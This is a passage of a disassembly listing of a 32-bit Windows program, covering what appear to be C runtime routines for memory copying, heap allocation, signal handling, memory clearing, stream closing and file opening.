add edx, ebx
sub edx, ecx
mov [ebp+var_14], edx
add ebx, eax
sub ebx, ecx
mov [ebp+var_10], ebx
mov esi, [ebp+var_14]
mov edi, [ebp+var_10]
mov ecx, [ebp+var_18]
rep movsb
mov eax, [ebp+arg_0]
jmp short loc_40D942
; ---------------------------------------------------------------------------
loc_40D8EF: ; CODE XREF: sub_40D86C+37�j
cmp ecx, edi
jnz short loc_40D928
neg ecx
add ecx, 10h
mov [ebp+var_1C], ecx
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov ecx, [ebp+var_1C]
rep movsb
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_1C]
mov edx, [ebp+arg_4]
add edx, [ebp+var_1C]
mov eax, [ebp+arg_8]
sub eax, [ebp+var_1C]
push eax
push edx
push ecx
call sub_40D86C
add esp, 0Ch
mov eax, [ebp+arg_0]
jmp short loc_40D942
; ---------------------------------------------------------------------------
loc_40D928: ; CODE XREF: sub_40D86C+85�j
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_8]
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebp+arg_0]
loc_40D942: ; CODE XREF: sub_40D86C+5D�j
; sub_40D86C+81�j ...
mov ebx, [ebp+var_4]
mov esi, [ebp+var_8]
mov edi, [ebp+var_C]
mov esp, ebp
pop ebp
retn
sub_40D86C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D94F proc near ; CODE XREF: sub_40777A+E�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0040DA54 SIZE 00000019 BYTES
push 0Ch
push offset dword_4217E0
call __SEH_prolog4
mov ecx, [ebp+arg_0]
xor edi, edi
cmp ecx, edi
jbe short loc_40D992
push 0FFFFFFE0h
pop eax
xor edx, edx
div ecx
cmp eax, [ebp+arg_4]
sbb eax, eax
inc eax
jnz short loc_40D992
call sub_4057D3
mov dword ptr [eax], 0Ch
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
loc_40D98B: ; CODE XREF: sub_40D94F+E6�j
; sub_40D94F+F2�j
xor eax, eax
jmp loc_40DA67
; ---------------------------------------------------------------------------
loc_40D992: ; CODE XREF: sub_40D94F+13�j
; sub_40D94F+22�j
imul ecx, [ebp+arg_4]
mov esi, ecx
mov [ebp+arg_0], esi
cmp esi, edi
jnz short loc_40D9A2
xor esi, esi
inc esi
loc_40D9A2: ; CODE XREF: sub_40D94F+4E�j
; sub_40D94F+DB�j
xor ebx, ebx
mov [ebp+var_1C], ebx
cmp esi, 0FFFFFFE0h
ja short loc_40DA15
cmp ds:dword_434DF4, 3
jnz short loc_40DA00
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
mov eax, [ebp+arg_0]
cmp eax, ds:dword_434DE4
ja short loc_40DA00
push 4
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], edi
push [ebp+arg_0]
call sub_4062F9
pop ecx
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40DA4B
mov ebx, [ebp+var_1C]
cmp ebx, edi
jz short loc_40DA04
push [ebp+arg_0]
push edi
push ebx
call sub_407B70
add esp, 0Ch
loc_40DA00: ; CODE XREF: sub_40D94F+64�j
; sub_40D94F+78�j
cmp ebx, edi
jnz short loc_40DA65
loc_40DA04: ; CODE XREF: sub_40D94F+A2�j
push esi
push 8
push ds:dword_425F68
call ds:dword_41D114
mov ebx, eax
loc_40DA15: ; CODE XREF: sub_40D94F+5B�j
cmp ebx, edi
jnz short loc_40DA65
cmp ds:dword_4262EC, edi
jz short loc_40DA54
push esi
call sub_408062
pop ecx
test eax, eax
jnz loc_40D9A2
mov eax, [ebp+arg_8]
cmp eax, edi
jz loc_40D98B
mov dword ptr [eax], 0Ch
jmp loc_40D98B
sub_40D94F endp
; =============== S U B R O U T I N E =======================================
sub_40DA46 proc near ; DATA XREF: .kSjx934:004217F8�o
xor edi, edi
mov esi, [ebp+0Ch]
sub_40DA46 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40DA4B proc near ; CODE XREF: sub_40D94F+98�p
push 4
call sub_40591F
pop ecx
retn
sub_40DA4B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40D94F
loc_40DA54: ; CODE XREF: sub_40D94F+D0�j
cmp ebx, edi
jnz short loc_40DA65
mov eax, [ebp+arg_8]
cmp eax, edi
jz short loc_40DA65
mov dword ptr [eax], 0Ch
loc_40DA65: ; CODE XREF: sub_40D94F+B3�j
; sub_40D94F+C8�j ...
mov eax, ebx
loc_40DA67: ; CODE XREF: sub_40D94F+3E�j
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_40D94F
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DA6D proc near ; CODE XREF: sub_4077C2+C�p
; sub_40DC88+3E�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0040DBBA SIZE 000000CE BYTES
push 10h
push offset dword_421800
call __SEH_prolog4
mov ebx, [ebp+arg_0]
test ebx, ebx
jnz short loc_40DA8E
push [ebp+arg_4]
call sub_4036E0
pop ecx
jmp loc_40DC5A
; ---------------------------------------------------------------------------
loc_40DA8E: ; CODE XREF: sub_40DA6D+11�j
mov esi, [ebp+arg_4]
test esi, esi
jnz short loc_40DAA1
push ebx
call sub_403603
pop ecx
jmp loc_40DC58
; ---------------------------------------------------------------------------
loc_40DAA1: ; CODE XREF: sub_40DA6D+26�j
cmp ds:dword_434DF4, 3
jnz loc_40DC41
loc_40DAAE: ; CODE XREF: sub_40DA6D+169�j
xor edi, edi
mov [ebp+var_1C], edi
cmp esi, 0FFFFFFE0h
ja loc_40DC46
push 4
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], edi
push ebx
call sub_405B25
pop ecx
mov [ebp+var_20], eax
cmp eax, edi
jz loc_40DB77
cmp esi, ds:dword_434DE4
ja short loc_40DB2A
push esi
push ebx
push eax
call sub_40601A
add esp, 0Ch
test eax, eax
jz short loc_40DAF5
mov [ebp+var_1C], ebx
jmp short loc_40DB2A
; ---------------------------------------------------------------------------
loc_40DAF5: ; CODE XREF: sub_40DA6D+81�j
push esi
call sub_4062F9
pop ecx
mov [ebp+var_1C], eax
cmp eax, edi
jz short loc_40DB2A
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_40DB0D
mov eax, esi
loc_40DB0D: ; CODE XREF: sub_40DA6D+9C�j
push eax
push ebx
push [ebp+var_1C]
call sub_407BF0
push ebx
call sub_405B25
mov [ebp+var_20], eax
push ebx
push eax
call sub_405B50
add esp, 18h
loc_40DB2A: ; CODE XREF: sub_40DA6D+72�j
; sub_40DA6D+86�j ...
cmp [ebp+var_1C], edi
jnz short loc_40DB77
cmp esi, edi
jnz short loc_40DB39
xor esi, esi
inc esi
mov [ebp+arg_4], esi
loc_40DB39: ; CODE XREF: sub_40DA6D+C4�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push edi
push ds:dword_425F68
call ds:dword_41D114
mov [ebp+var_1C], eax
cmp eax, edi
jz short loc_40DB77
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_40DB61
mov eax, esi
loc_40DB61: ; CODE XREF: sub_40DA6D+F0�j
push eax
push ebx
push [ebp+var_1C]
call sub_407BF0
push ebx
push [ebp+var_20]
call sub_405B50
add esp, 14h
loc_40DB77: ; CODE XREF: sub_40DA6D+66�j
; sub_40DA6D+C0�j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40DBB1
cmp [ebp+var_20], 0
jnz short loc_40DBBA
test esi, esi
jnz short loc_40DB8E
inc esi
loc_40DB8E: ; CODE XREF: sub_40DA6D+11E�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push ebx
push 0
push ds:dword_425F68
call ds:dword_41D154
mov edi, eax
jmp short loc_40DBBD
sub_40DA6D endp
; =============== S U B R O U T I N E =======================================
sub_40DBAB proc near ; DATA XREF: .kSjx934:00421818�o
mov esi, [ebp+0Ch]
mov ebx, [ebp+8]
sub_40DBAB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40DBB1 proc near ; CODE XREF: sub_40DA6D+111�p
push 4
call sub_40591F
pop ecx
retn
sub_40DBB1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40DA6D
loc_40DBBA: ; CODE XREF: sub_40DA6D+11A�j
mov edi, [ebp+var_1C]
loc_40DBBD: ; CODE XREF: sub_40DA6D+13C�j
test edi, edi
jnz loc_40DC84
cmp ds:dword_4262EC, edi
jz short loc_40DBF9
push esi
call sub_408062
pop ecx
test eax, eax
jnz loc_40DAAE
call sub_4057D3
cmp [ebp+var_20], edi
jnz short loc_40DC52
loc_40DBE6: ; CODE XREF: sub_40DA6D+1F8�j
mov esi, eax
call ds:dword_41D0F0
push eax
call sub_405798
pop ecx
mov [esi], eax
jmp short loc_40DC58
; ---------------------------------------------------------------------------
loc_40DBF9: ; CODE XREF: sub_40DA6D+15E�j
test edi, edi
jnz loc_40DC84
call sub_4057D3
cmp [ebp+var_20], edi
jz short loc_40DC73
mov dword ptr [eax], 0Ch
jmp short loc_40DC84
; ---------------------------------------------------------------------------
loc_40DC13: ; CODE XREF: sub_40DA6D+1D7�j
test esi, esi
jnz short loc_40DC18
inc esi
loc_40DC18: ; CODE XREF: sub_40DA6D+1A8�j
push esi
push ebx
push 0
push ds:dword_425F68
call ds:dword_41D154
mov edi, eax
test edi, edi
jnz short loc_40DC84
cmp ds:dword_4262EC, eax
jz short loc_40DC6A
push esi
call sub_408062
pop ecx
test eax, eax
jz short loc_40DC60
loc_40DC41: ; CODE XREF: sub_40DA6D+3B�j
cmp esi, 0FFFFFFE0h
jbe short loc_40DC13
loc_40DC46: ; CODE XREF: sub_40DA6D+49�j
push esi
call sub_408062
pop ecx
call sub_4057D3
loc_40DC52: ; CODE XREF: sub_40DA6D+177�j
mov dword ptr [eax], 0Ch
loc_40DC58: ; CODE XREF: sub_40DA6D+2F�j
; sub_40DA6D+18A�j
xor eax, eax
loc_40DC5A: ; CODE XREF: sub_40DA6D+1C�j
; sub_40DA6D+219�j
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_40DC60: ; CODE XREF: sub_40DA6D+1D2�j
call sub_4057D3
jmp loc_40DBE6
; ---------------------------------------------------------------------------
loc_40DC6A: ; CODE XREF: sub_40DA6D+1C7�j
test edi, edi
jnz short loc_40DC84
call sub_4057D3
loc_40DC73: ; CODE XREF: sub_40DA6D+19C�j
mov esi, eax
call ds:dword_41D0F0
push eax
call sub_405798
mov [esi], eax
pop ecx
loc_40DC84: ; CODE XREF: sub_40DA6D+152�j
; sub_40DA6D+18E�j ...
mov eax, edi
jmp short loc_40DC5A
; END OF FUNCTION CHUNK FOR sub_40DA6D
; =============== S U B R O U T I N E =======================================
sub_40DC88 proc near ; CODE XREF: sub_40780D+10�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_4]
push esi
xor esi, esi
cmp ecx, esi
jbe short loc_40DCBC
push 0FFFFFFE0h
xor edx, edx
pop eax
div ecx
cmp eax, [esp+4+arg_8]
jnb short loc_40DCBC
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 0Ch
call sub_402F39
add esp, 14h
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40DCBC: ; CODE XREF: sub_40DC88+9�j
; sub_40DC88+16�j
imul ecx, [esp+4+arg_8]
push ecx
push [esp+8+arg_0]
call sub_40DA6D
pop ecx
pop ecx
pop esi
retn
sub_40DC88 endp
; =============== S U B R O U T I N E =======================================
sub_40DCCF proc near ; CODE XREF: sub_407B19+27�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_426424, eax
mov ds:dword_426428, eax
mov ds:dword_42642C, eax
mov ds:dword_426430, eax
retn
sub_40DCCF endp
; =============== S U B R O U T I N E =======================================
sub_40DCE8 proc near ; CODE XREF: sub_40DD29+5A�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, ds:dword_423E44
push esi
loc_40DCF3: ; CODE XREF: sub_40DCE8+1E�j
cmp [eax+4], edx
jz short loc_40DD08
mov esi, ecx
imul esi, 0Ch
add esi, [esp+4+arg_0]
add eax, 0Ch
cmp eax, esi
jb short loc_40DCF3
loc_40DD08: ; CODE XREF: sub_40DCE8+E�j
imul ecx, 0Ch
add ecx, [esp+4+arg_0]
pop esi
cmp eax, ecx
jnb short loc_40DD19
cmp [eax+4], edx
jz short locret_40DD1B
loc_40DD19: ; CODE XREF: sub_40DCE8+2A�j
xor eax, eax
locret_40DD1B: ; CODE XREF: sub_40DCE8+2F�j
retn
sub_40DCE8 endp
; =============== S U B R O U T I N E =======================================
sub_40DD1C proc near ; CODE XREF: sub_4101BD:loc_4101EA�p
push ds:dword_42642C
call sub_405193
pop ecx
retn
sub_40DD1C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DD29 proc near ; CODE XREF: sub_4101BD+38�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0040DED3 SIZE 00000006 BYTES
push 20h
push offset dword_421820
call __SEH_prolog4
xor edi, edi
mov [ebp+var_1C], edi
mov [ebp+var_28], edi
mov ebx, [ebp+arg_0]
cmp ebx, 0Bh
jg short loc_40DD91
jz short loc_40DD5C
mov eax, ebx
push 2
pop ecx
sub eax, ecx
jz short loc_40DD72
sub eax, ecx
jz short loc_40DD5C
sub eax, ecx
jz short loc_40DDBC
sub eax, ecx
jnz short loc_40DDA0
loc_40DD5C: ; CODE XREF: sub_40DD29+1C�j
; sub_40DD29+29�j
call sub_40531A
mov edi, eax
mov [ebp+var_28], edi
test edi, edi
jnz short loc_40DD7E
loc_40DD6A: ; CODE XREF: sub_40DD29+91�j
or eax, 0FFFFFFFFh
jmp loc_40DED3
; ---------------------------------------------------------------------------
loc_40DD72: ; CODE XREF: sub_40DD29+25�j
mov esi, offset dword_426424
mov eax, ds:dword_426424
jmp short loc_40DDDE
; ---------------------------------------------------------------------------
loc_40DD7E: ; CODE XREF: sub_40DD29+3F�j
push dword ptr [edi+5Ch]
mov edx, ebx
call sub_40DCE8
mov esi, eax
add esi, 8
mov eax, [esi]
jmp short loc_40DDEB
; ---------------------------------------------------------------------------
loc_40DD91: ; CODE XREF: sub_40DD29+1A�j
mov eax, ebx
sub eax, 0Fh
jz short loc_40DDD4
sub eax, 6
jz short loc_40DDC8
dec eax
jz short loc_40DDBC
loc_40DDA0: ; CODE XREF: sub_40DD29+31�j
call sub_4057D3
mov dword ptr [eax], 16h
xor eax, eax
push eax
push eax
push eax
push eax
push eax
call sub_402F39
add esp, 14h
jmp short loc_40DD6A
; ---------------------------------------------------------------------------
loc_40DDBC: ; CODE XREF: sub_40DD29+2D�j
; sub_40DD29+75�j
mov esi, offset dword_42642C
mov eax, ds:dword_42642C
jmp short loc_40DDDE
; ---------------------------------------------------------------------------
loc_40DDC8: ; CODE XREF: sub_40DD29+72�j
mov esi, offset dword_426428
mov eax, ds:dword_426428
jmp short loc_40DDDE
; ---------------------------------------------------------------------------
loc_40DDD4: ; CODE XREF: sub_40DD29+6D�j
mov esi, offset dword_426430
mov eax, ds:dword_426430
loc_40DDDE: ; CODE XREF: sub_40DD29+53�j
; sub_40DD29+9D�j ...
mov [ebp+var_1C], 1
push eax
call sub_405193
loc_40DDEB: ; CODE XREF: sub_40DD29+66�j
mov [ebp+var_20], eax
pop ecx
xor eax, eax
cmp [ebp+var_20], 1
jz loc_40DED3
cmp [ebp+var_20], eax
jnz short loc_40DE07
push 3
call sub_407AEA
loc_40DE07: ; CODE XREF: sub_40DD29+D5�j
cmp [ebp+var_1C], eax
jz short loc_40DE13
push eax
call sub_4059F7
pop ecx
loc_40DE13: ; CODE XREF: sub_40DD29+E1�j
xor eax, eax
mov [ebp+ms_exc.disabled], eax
cmp ebx, 8
jz short loc_40DE27
cmp ebx, 0Bh
jz short loc_40DE27
cmp ebx, 4
jnz short loc_40DE42
loc_40DE27: ; CODE XREF: sub_40DD29+F2�j
; sub_40DD29+F7�j
mov ecx, [edi+60h]
mov [ebp+var_2C], ecx
mov [edi+60h], eax
cmp ebx, 8
jnz short loc_40DE75
mov ecx, [edi+64h]
mov [ebp+var_30], ecx
mov dword ptr [edi+64h], 8Ch
loc_40DE42: ; CODE XREF: sub_40DD29+FC�j
cmp ebx, 8
jnz short loc_40DE75
mov ecx, ds:dword_423E38
mov [ebp+var_24], ecx
loc_40DE50: ; CODE XREF: sub_40DD29+14A�j
mov ecx, ds:dword_423E3C
mov edx, ds:dword_423E38
add ecx, edx
cmp [ebp+var_24], ecx
jge short loc_40DE7C
mov ecx, [ebp+var_24]
imul ecx, 0Ch
mov edx, [edi+5Ch]
mov [ecx+edx+8], eax
inc [ebp+var_24]
jmp short loc_40DE50
; ---------------------------------------------------------------------------
loc_40DE75: ; CODE XREF: sub_40DD29+10A�j
; sub_40DD29+11C�j
call sub_40518A
mov [esi], eax
loc_40DE7C: ; CODE XREF: sub_40DD29+138�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40DE9D
cmp ebx, 8
jnz short sub_40DEAC
push dword ptr [edi+64h]
push ebx
call [ebp+var_20]
pop ecx
jmp short loc_40DEB0
sub_40DD29 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40DE97 proc near ; DATA XREF: .kSjx934:00421838�o
mov ebx, [ebp+8]
mov edi, [ebp-28h]
sub_40DE97 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40DE9D proc near ; CODE XREF: sub_40DD29+15A�p
cmp dword ptr [ebp-1Ch], 0
jz short locret_40DEAB
push 0
call sub_40591F
pop ecx
locret_40DEAB: ; CODE XREF: sub_40DE9D+4�j
retn
sub_40DE9D endp
; =============== S U B R O U T I N E =======================================
sub_40DEAC proc near ; CODE XREF: sub_40DD29+162�j
push ebx
call dword ptr [ebp-20h]
loc_40DEB0: ; CODE XREF: sub_40DD29+16C�j
pop ecx
cmp ebx, 8
jz short loc_40DEC0
cmp ebx, 0Bh
jz short loc_40DEC0
cmp ebx, 4
jnz short loc_40DED1
loc_40DEC0: ; CODE XREF: sub_40DEAC+8�j
; sub_40DEAC+D�j
mov eax, [ebp-2Ch]
mov [edi+60h], eax
cmp ebx, 8
jnz short loc_40DED1
mov eax, [ebp-30h]
mov [edi+64h], eax
loc_40DED1: ; CODE XREF: sub_40DEAC+12�j
; sub_40DEAC+1D�j
xor eax, eax
sub_40DEAC endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_40DD29
loc_40DED3: ; CODE XREF: sub_40DD29+44�j
; sub_40DD29+CC�j
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_40DD29
; =============== S U B R O U T I N E =======================================
sub_40DED9 proc near ; CODE XREF: sub_407B19+21�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_426438, eax
retn
sub_40DED9 endp
; =============== S U B R O U T I N E =======================================
sub_40DEE3 proc near ; CODE XREF: sub_407B19+1B�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_426444, eax
retn
sub_40DEE3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DEED proc near ; CODE XREF: sub_40DF44+31�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4
mov [ebp+var_4], edi
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_4]
shr ecx, 7
pxor xmm0, xmm0
jmp short loc_40DF0D
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h, 4 dup(0)
db 90h
; ---------------------------------------------------------------------------
loc_40DF0D: ; CODE XREF: sub_40DEED+16�j
; sub_40DEED+4E�j
movdqa oword ptr [edi], xmm0
movdqa oword ptr [edi+10h], xmm0
movdqa oword ptr [edi+20h], xmm0
movdqa oword ptr [edi+30h], xmm0
movdqa oword ptr [edi+40h], xmm0
movdqa oword ptr [edi+50h], xmm0
movdqa oword ptr [edi+60h], xmm0
movdqa oword ptr [edi+70h], xmm0
lea edi, [edi+80h]
dec ecx
jnz short loc_40DF0D
mov edi, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_40DEED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DF44 proc near ; CODE XREF: sub_407B70+27�j
; sub_40DF44+7D�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_4], edi
mov eax, [ebp+arg_0]
cdq
mov edi, eax
xor edi, edx
sub edi, edx
and edi, 0Fh
xor edi, edx
sub edi, edx
test edi, edi
jnz short loc_40DF9E
mov ecx, [ebp+arg_8]
mov edx, ecx
and edx, 7Fh
mov [ebp+var_C], edx
cmp ecx, edx
jz short loc_40DF83
sub ecx, edx
push ecx
push eax
call sub_40DEED
add esp, 8
mov eax, [ebp+arg_0]
mov edx, [ebp+var_C]
loc_40DF83: ; CODE XREF: sub_40DF44+2B�j
test edx, edx
jz short loc_40DFCC
add eax, [ebp+arg_8]
sub eax, edx
mov [ebp+var_8], eax
xor eax, eax
mov edi, [ebp+var_8]
mov ecx, [ebp+var_C]
rep stosb
mov eax, [ebp+arg_0]
jmp short loc_40DFCC
; ---------------------------------------------------------------------------
loc_40DF9E: ; CODE XREF: sub_40DF44+1C�j
neg edi
add edi, 10h
mov [ebp+var_10], edi
xor eax, eax
mov edi, [ebp+arg_0]
mov ecx, [ebp+var_10]
rep stosb
mov eax, [ebp+var_10]
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_8]
add ecx, eax
sub edx, eax
push edx
push 0
push ecx
call sub_40DF44
add esp, 0Ch
mov eax, [ebp+arg_0]
loc_40DFCC: ; CODE XREF: sub_40DF44+41�j
; sub_40DF44+58�j
mov edi, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_40DF44 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DFD3 proc near ; CODE XREF: sub_40813B+E�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 10h
push offset dword_421840
call __SEH_prolog4
xor ebx, ebx
mov [ebp+var_1C], ebx
push 1
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], ebx
push 3
pop edi
loc_40DFF2: ; CODE XREF: sub_40DFD3+7F�j
mov [ebp+var_20], edi
cmp edi, ds:dword_434DC0
jge short loc_40E054
mov esi, edi
shl esi, 2
mov eax, ds:dword_433DA0
add eax, esi
cmp [eax], ebx
jz short loc_40E051
mov eax, [eax]
test byte ptr [eax+0Ch], 83h
jz short loc_40E024
push eax
call sub_4034C4
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_40E024
inc [ebp+var_1C]
loc_40E024: ; CODE XREF: sub_40DFD3+40�j
; sub_40DFD3+4C�j
cmp edi, 14h
jl short loc_40E051
mov eax, ds:dword_433DA0
mov eax, [esi+eax]
add eax, 20h
push eax
call ds:dword_41D170
mov eax, ds:dword_433DA0
push dword ptr [esi+eax]
call sub_403603
pop ecx
mov eax, ds:dword_433DA0
mov [esi+eax], ebx
loc_40E051: ; CODE XREF: sub_40DFD3+38�j
; sub_40DFD3+54�j
inc edi
jmp short loc_40DFF2
; ---------------------------------------------------------------------------
loc_40E054: ; CODE XREF: sub_40DFD3+28�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40E069
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_40DFD3 endp
; =============== S U B R O U T I N E =======================================
sub_40E069 proc near ; CODE XREF: sub_40DFD3+88�p
; DATA XREF: .kSjx934:00421858�o
push 1
call sub_40591F
pop ecx
retn
sub_40E069 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E072 proc near ; CODE XREF: sub_40E6B0+72�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
xor ebx, ebx
test byte ptr [ebp+arg_8], 80h
push edi
push 10h
mov esi, eax
mov [ebp+var_14], ebx
mov [ebp+var_18], ebx
mov [ebp+var_2], bl
mov [ebp+var_28], 0Ch
mov [ebp+var_24], ebx
pop edi
jz short loc_40E0A4
mov [ebp+var_20], ebx
mov [ebp+var_1], 10h
jmp short loc_40E0AE
; ---------------------------------------------------------------------------
loc_40E0A4: ; CODE XREF: sub_40E072+27�j
mov [ebp+var_20], 1
mov [ebp+var_1], bl
loc_40E0AE: ; CODE XREF: sub_40E072+30�j
lea eax, [ebp+var_14]
push eax
call sub_410889
test eax, eax
pop ecx
jz short loc_40E0C9
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402E3D
add esp, 14h
loc_40E0C9: ; CODE XREF: sub_40E072+48�j
lea eax, [ebp+var_18]
push eax
call sub_407906
test eax, eax
pop ecx
jz short loc_40E0E4
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402E3D
add esp, 14h
loc_40E0E4: ; CODE XREF: sub_40E072+63�j
mov eax, 8000h
test [ebp+arg_8], eax
jnz short loc_40E100
test [ebp+arg_8], 74000h
jnz short loc_40E0FC
cmp [ebp+var_14], eax
jz short loc_40E100
loc_40E0FC: ; CODE XREF: sub_40E072+83�j
or [ebp+var_1], 80h
loc_40E100: ; CODE XREF: sub_40E072+7A�j
; sub_40E072+88�j
mov eax, [ebp+arg_8]
push 3
pop edx
and eax, edx
sub eax, ebx
mov ecx, 80000000h
jz short loc_40E14F
dec eax
jz short loc_40E146
dec eax
jz short loc_40E13D
loc_40E117: ; CODE XREF: sub_40E072+F6�j
; sub_40E072+14F�j ...
call sub_4057E6
mov [eax], ebx
or dword ptr [esi], 0FFFFFFFFh
call sub_4057D3
push 16h
pop esi
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], esi
call sub_402F39
add esp, 14h
jmp loc_40E5CC
; ---------------------------------------------------------------------------
loc_40E13D: ; CODE XREF: sub_40E072+A3�j
mov [ebp+var_C], 0C0000000h
jmp short loc_40E152
; ---------------------------------------------------------------------------
loc_40E146: ; CODE XREF: sub_40E072+A0�j
mov [ebp+var_C], 40000000h
jmp short loc_40E152
; ---------------------------------------------------------------------------
loc_40E14F: ; CODE XREF: sub_40E072+9D�j
mov [ebp+var_C], ecx
loc_40E152: ; CODE XREF: sub_40E072+D2�j
; sub_40E072+DB�j
mov eax, [ebp+arg_C]
sub eax, edi
jz short loc_40E18E
sub eax, edi
jz short loc_40E185
sub eax, edi
jz short loc_40E17C
sub eax, edi
jz short loc_40E177
sub eax, 40h
jnz short loc_40E117
xor eax, eax
cmp [ebp+var_C], ecx
setz al
mov [ebp+var_8], eax
jmp short loc_40E191
; ---------------------------------------------------------------------------
loc_40E177: ; CODE XREF: sub_40E072+F1�j
mov [ebp+var_8], edx
jmp short loc_40E191
; ---------------------------------------------------------------------------
loc_40E17C: ; CODE XREF: sub_40E072+ED�j
mov [ebp+var_8], 2
jmp short loc_40E191
; ---------------------------------------------------------------------------
loc_40E185: ; CODE XREF: sub_40E072+E9�j
mov [ebp+var_8], 1
jmp short loc_40E191
; ---------------------------------------------------------------------------
loc_40E18E: ; CODE XREF: sub_40E072+E5�j
mov [ebp+var_8], ebx
loc_40E191: ; CODE XREF: sub_40E072+103�j
; sub_40E072+108�j ...
mov eax, [ebp+arg_8]
mov edx, 700h
and eax, edx
mov ecx, 400h
cmp eax, ecx
jg short loc_40E1E2
jz short loc_40E1D9
cmp eax, ebx
jz short loc_40E1D9
cmp eax, 100h
jz short loc_40E1D0
cmp eax, 200h
jz loc_40E254
cmp eax, 300h
jnz loc_40E117
mov [ebp+var_10], 2
jmp short loc_40E1FF
; ---------------------------------------------------------------------------
loc_40E1D0: ; CODE XREF: sub_40E072+13D�j
mov [ebp+var_10], 4
jmp short loc_40E1FF
; ---------------------------------------------------------------------------
loc_40E1D9: ; CODE XREF: sub_40E072+132�j
; sub_40E072+136�j
mov [ebp+var_10], 3
jmp short loc_40E1FF
; ---------------------------------------------------------------------------
loc_40E1E2: ; CODE XREF: sub_40E072+130�j
cmp eax, 500h
jz short loc_40E1F8
cmp eax, 600h
jz short loc_40E254
cmp eax, edx
jnz loc_40E117
loc_40E1F8: ; CODE XREF: sub_40E072+175�j
mov [ebp+var_10], 1
loc_40E1FF: ; CODE XREF: sub_40E072+15C�j
